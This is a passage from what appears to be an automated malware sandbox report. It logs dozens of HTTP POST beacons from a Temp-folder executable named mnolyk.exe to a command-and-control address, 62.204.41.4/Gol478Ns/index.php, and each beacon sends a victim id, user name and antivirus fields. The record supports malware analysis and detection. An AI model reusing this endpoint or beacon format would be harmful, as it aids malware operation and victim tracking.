                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:53.595475912 CET355INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:53 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          222192.168.2.64994462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:53.792361975 CET356OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:53.854832888 CET356INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:53 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          223192.168.2.64994562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:54.040738106 CET357OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:54.107270002 CET357INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          224192.168.2.64994662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:54.317743063 CET358OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:54.382225990 CET358INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          225192.168.2.64994762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:54.584701061 CET359OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:54.649368048 CET359INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          226192.168.2.64994862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:54.830001116 CET360OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:54.893845081 CET360INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          227192.168.2.64994962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:55.074451923 CET361OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:55.140377045 CET361INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:55 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          228192.168.2.64995062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:55.313520908 CET362OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:55.375415087 CET362INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:55 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          229192.168.2.64995162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:55.550312996 CET363OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:55.615092993 CET363INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:55 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          23192.168.2.64974162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:56.423672915 CET128OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:56.487675905 CET128INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:56 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          230192.168.2.64995262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:55.791186094 CET364OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:55.854109049 CET364INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:55 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          231192.168.2.64995362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:56.032155037 CET365OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:56.098236084 CET365INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:56 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          232192.168.2.64995462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:56.265158892 CET366OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:56.327336073 CET366INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:56 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          233192.168.2.64995562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:56.500323057 CET367OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:56.563816071 CET367INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:56 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          234192.168.2.64995662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:56.737292051 CET368OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:56.802118063 CET368INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:56 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          235192.168.2.64995762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:56.989415884 CET369OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:57.056065083 CET369INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:57 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          236192.168.2.64995862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:57.237616062 CET370OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:57.307380915 CET370INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:57 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          237192.168.2.64995962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:57.490225077 CET371OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:57.553457022 CET371INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:57 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          238192.168.2.64996062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:57.722505093 CET372OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:57.785676003 CET372INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:57 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          239192.168.2.64996162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:57.956540108 CET373OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:01:58.020838022 CET373INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:01:57 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          24192.168.2.64974262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:00:56.667263031 CET129OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                          Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
                          Feb 7, 2023 20:00:56.728579044 CET129INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Tue, 07 Feb 2023 19:00:56 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          240192.168.2.64996262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          TimestampkBytes transferredDirectionData
                          Feb 7, 2023 20:01:58.212789059 CET374OUTPOST /Gol478Ns/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 62.204.41.4
                          Content-Length: 90
                          Cache-Control: no-cache
